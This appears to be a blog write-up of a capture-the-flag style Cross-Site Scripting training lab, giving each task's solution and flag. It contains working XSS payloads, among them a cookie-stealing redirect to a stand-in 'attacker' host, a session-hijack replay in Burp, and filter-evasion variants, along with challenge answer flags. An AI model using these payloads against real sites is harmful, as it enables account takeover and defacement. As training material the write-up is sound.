Cross-Site Scripting

Task 1 Introduction

Answer the questions below

Read the introduction.

No answer needed…

Task 2 Deploy your XSS Playground

Answer the questions below

Deploy the machine and navigate to http://<IP&gt;

No answer needed…

Task 3 Stored XSS

Answer the questions below

The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine.

No answer needed…

Add a comment and see if you can insert some of your own HTML.

Doing so will reveal the answer to this question.

To answser this question, I took HTML img tags and submitted an image to the comments box like so:

<img src="https://i.insider.com/5ed7f5e0aee6a80f0b0cadb6" alt="BOO" width="500" height="600">

Answer = HTML_T4gs

Create an alert popup box appear on the page with your document cookies.

I already knew that we could create a popup using the script tags, but I had to look up how to read cookie data in JavaScript. https://www.w3schools.com/js/js_cookies.asp explains this well and we can see that “document.cookie” is whats needed. So I added this to script tags with “alert” to creat the popup.

<script>alert(document.cookie)</script>

Answer = W3LL_D0N3_LVL2

Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.

To find the name of the element we want to change I right clicked on the word and chose “inspect element”. I could then see that the name was “thm-title”

After google searching how to change a header using JavaScript I found this link https://www.w3schools.com/js/js_htmldom_html.asp that explains the code needed. Then I just changed it to match the name of our header and the text I wanted to input.

<script>document.getElementById("thm-title").innerHTML = "I am a hacker";</script>

Answer = websites_can_be_easily_defaced_with_xss

Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code:

<script>window.location='http://attacker/?cookie='+document.cookie</script>

This script navigates the users browser to a different URL, this new request will includes a victims cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.

Take over Jack’s account by stealing his cookie, what was his cookie value?

We need to think about how to find Jack’s cookie… By running the website through BURP we can see a /logs URL…

This suggests that the website is keeping or is capable of keeping access logs, so lets go to that page.

We see a page that says that anything that requests /log/{text} will be logged here… so lets alter the JavaScript that THM provide to redirect via /logs … like so:

<script>window.location='http://10.10.100.216/log/?cookie='+document.cookie</script>

Answer = s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE

Post a comment as Jack.

To do this we can record our request using BURP, alter it, then forward on the manipulated request.

The part we want to manipulate is our cookie, and we want to swap this out for the cookie we found in the previous question. The image below shows how this would look

(Note that the *****comment and “Original Cookie” would be removed before forwarding the call)

When we forward this call in BURP we see the following:

Answer = c00ki3_stealing_

Task 4 Reflected XSS

Answer the questions below

Craft a reflected XSS payload that will cause a popup saying “Hello

Similar to before, we can use the HTML <script> tags to do this.

<script>alert("Hello")</script>

Answer = ThereIsMoreToXSSThanYouThink

Craft a reflected XSS payload that will cause a popup with your machines IP address.

I used the hint to find out that window.location.hostname, is the JavaScript to give us the hostname which in this case is the IP … therefore our code looks like this:

<script>alert(window.location.hostname)</script>

There is then a second popup displayed:

Answer = ReflectiveXss4TheWin

Task 5 DOM-Based XSS

Answer the questions below

Look at the deployed machines DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

To “alert with cookie” we can use the same code as we have used before. But to exploit the DOM I had to research a little. The hint suggested using the “mouseover” event, so our command looks like this.

"onmouseover="alert(document.cookie)"

After entering this into the text field and clicking “Update” we can see our cookie as planned.

If we click OK we then see another popup with out flag.

Answer = BreakingAnElementsTag

Create an onhover event on an image tag, that change the background color of the website to red.

For this I had to Google a bit… I don’t know much about JavaScript so used this site to do some research on DOM events:

https://www.w3schools.com/jsref/dom_obj_event.asp

I couldn’t find anything for “onhover” so decided to try and manipulate the same command used in the previouse question.

I stripped out the cookie command from before and then looked for an event option that would change the backgroud colour of a DOM

W3Schools looks like it might have the answer…

Lets try this:

After some playing around I changed the ” around red to single quotes ‘ …

test" onmouseover="document.body.style.backgroundColor = 'red'";

This worked and showed us the flag (and changed the BG colour)…

Answer = JavascriptIsAwesome

Task 6 Using XSS for IP and Port Scanning

Answer the questions below

Understand the basic proof of concept script.

Then create a file on your computer with the script, modify it to suit your network and run it. See if it picks up any of your devices that has a webserver running.

No answer needed…

Task 7 XSS Keylogger

Answer the questions below

Create your own version of an XSS keylogger and see it appear in the logs part of the site.

No answer needed…

Task 8 Filter Evasion

Answer the questions below

Bypass the filter that removes any script tags.

<img src="blah" onerror=alert("Hello") />

Answer = 3c3cf8d90aaece81710ab9db759352c0

The word alert is filtered, bypass it.

<img src="blah" onerror=confirm("Hello") />

Answer = a2e5ef66f5ff584a01d734ef5edaae91

The word hello is filtered, bypass it.

<img src="blah" onerror=alert("HHelloello") />

Answer = decba45d0eff17c6eedf1629393bee1d

Filtered in challenge 4 is as follows:

  • word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange
<img src="blah" ONERROR="alert('HHelloello')" />

Answer = 2482d2e8939fc85a9363617782270555

Task 9 Protection Methods & Other Exploits

Answer the questions below

Download and experiment with BeEF with the XSS playground.

No answer needed…

Take a look at XSS-Payloads.com, download one interesting looking payload and use it on the XSS playground.

No answer needed…

Comments are closed.

Blog at WordPress.com.

Up ↑

Design a site like this with WordPress.com
Get started